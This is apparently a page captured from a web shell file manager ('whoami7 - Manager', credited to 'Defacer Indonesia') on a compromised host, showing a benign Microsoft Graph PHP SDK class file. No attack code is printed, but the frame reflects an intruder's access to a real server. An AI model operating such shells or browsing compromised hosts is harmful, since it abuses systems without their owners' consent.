whoami7 - Manager
:
/
home
/
qbizpnmr
/
arif.umairtax.com
/
vendor
/
microsoft
/
microsoft-graph
/
src
/
Model
/
Upload File:
files >> /home/qbizpnmr/arif.umairtax.com/vendor/microsoft/microsoft-graph/src/Model/Synchronization.php
<?php /** * Copyright (c) Microsoft Corporation. All Rights Reserved. Licensed under the MIT License. See License in the project root for license information. * * Synchronization File * PHP version 7 * * @category Library * @package Microsoft.Graph * @copyright (c) Microsoft Corporation. All rights reserved. * @license https://opensource.org/licenses/MIT MIT License * @link https://graph.microsoft.com */ namespace Microsoft\Graph\Model; /** * Synchronization class * * @category Model * @package Microsoft.Graph * @copyright (c) Microsoft Corporation. All rights reserved. * @license https://opensource.org/licenses/MIT MIT License * @link https://graph.microsoft.com */ class Synchronization extends Entity { /** * Gets the secrets * Represents a collection of credentials to access provisioned cloud applications. * * @return array|null The secrets */ public function getSecrets() { if (array_key_exists("secrets", $this->_propDict)) { return $this->_propDict["secrets"]; } else { return null; } } /** * Sets the secrets * Represents a collection of credentials to access provisioned cloud applications. * * @param SynchronizationSecretKeyStringValuePair[] $val The secrets * * @return Synchronization */ public function setSecrets($val) { $this->_propDict["secrets"] = $val; return $this; } /** * Gets the jobs * Performs synchronization by periodically running in the background, polling for changes in one directory, and pushing them to another directory. * * @return array|null The jobs */ public function getJobs() { if (array_key_exists("jobs", $this->_propDict)) { return $this->_propDict["jobs"]; } else { return null; } } /** * Sets the jobs * Performs synchronization by periodically running in the background, polling for changes in one directory, and pushing them to another directory. * * @param SynchronizationJob[] $val The jobs * * @return Synchronization */ public function setJobs($val) { $this->_propDict["jobs"] = $val; return $this; } /** * Gets the templates * Preconfigured synchronization settings for a particular application. * * @return array|null The templates */ public function getTemplates() { if (array_key_exists("templates", $this->_propDict)) { return $this->_propDict["templates"]; } else { return null; } } /** * Sets the templates * Preconfigured synchronization settings for a particular application. * * @param SynchronizationTemplate[] $val The templates * * @return Synchronization */ public function setTemplates($val) { $this->_propDict["templates"] = $val; return $this; } }
Copyright ©2021 || Defacer Indonesia